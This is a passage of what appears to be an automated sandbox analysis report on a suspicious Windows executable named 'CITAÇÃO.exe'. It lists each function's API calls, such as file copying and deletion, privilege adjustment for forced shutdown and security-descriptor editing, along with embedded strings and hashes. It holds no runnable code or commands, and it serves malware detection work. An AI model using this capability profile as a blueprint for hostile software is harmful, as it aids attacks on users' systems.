                                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                      • CloseDesktop.USER32(?), ref: 0044657A
                                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                      • String ID: $@OH$default$winsta0
                                                      • API String ID: 3324942560-3791954436
                                                      • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                      • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                      Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                        • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • _wcscat.LIBCMT ref: 0044BD94
                                                      • _wcscat.LIBCMT ref: 0044BDBD
                                                      • __wsplitpath.LIBCMT ref: 0044BDEA
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                      • _wcscpy.LIBCMT ref: 0044BE71
                                                      • _wcscat.LIBCMT ref: 0044BE83
                                                      • _wcscat.LIBCMT ref: 0044BE95
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                      • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                      • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                      • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                      • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 2188072990-1173974218
                                                      • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                      • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                      • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                      • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                      Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                      • __swprintf.LIBCMT ref: 004789D3
                                                      • __swprintf.LIBCMT ref: 00478A1D
                                                      • __swprintf.LIBCMT ref: 00478A4B
                                                      • __swprintf.LIBCMT ref: 00478A79
                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                      • __swprintf.LIBCMT ref: 00478AA7
                                                      • __swprintf.LIBCMT ref: 00478AD5
                                                      • __swprintf.LIBCMT ref: 00478B03
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 999945258-2428617273
                                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                      Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                      • __wsplitpath.LIBCMT ref: 00403492
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • _wcscpy.LIBCMT ref: 004034A7
                                                      • _wcscat.LIBCMT ref: 004034BC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                      • _wcscpy.LIBCMT ref: 004035A0
                                                      • _wcslen.LIBCMT ref: 00403623
                                                      • _wcslen.LIBCMT ref: 0040367D
                                                      Strings
                                                      • Error opening the file, xrefs: 00428231
                                                      • Unterminated string, xrefs: 00428348
                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                      • _, xrefs: 0040371C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                      • API String ID: 3393021363-188983378
                                                      • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                      • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                      Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                      Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                      • __swprintf.LIBCMT ref: 00431C2E
                                                      • _wcslen.LIBCMT ref: 00431C3A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2192556992-3457252023
                                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                      Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                      • __swprintf.LIBCMT ref: 004722B9
                                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FolderPath$LocalTime__swprintf
                                                      • String ID: %.3d
                                                      • API String ID: 3337348382-986655627
                                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                      Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                      Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                      • GetLastError.KERNEL32 ref: 00433414
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                      • String ID: SeShutdownPrivilege
                                                      • API String ID: 2938487562-3733053543
                                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                      Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 1255039815-0
                                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                      Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00433073
                                                      • __swprintf.LIBCMT ref: 00433085
                                                      • __wcsicoll.LIBCMT ref: 00433092
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                      • LockResource.KERNEL32(?), ref: 00433120
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
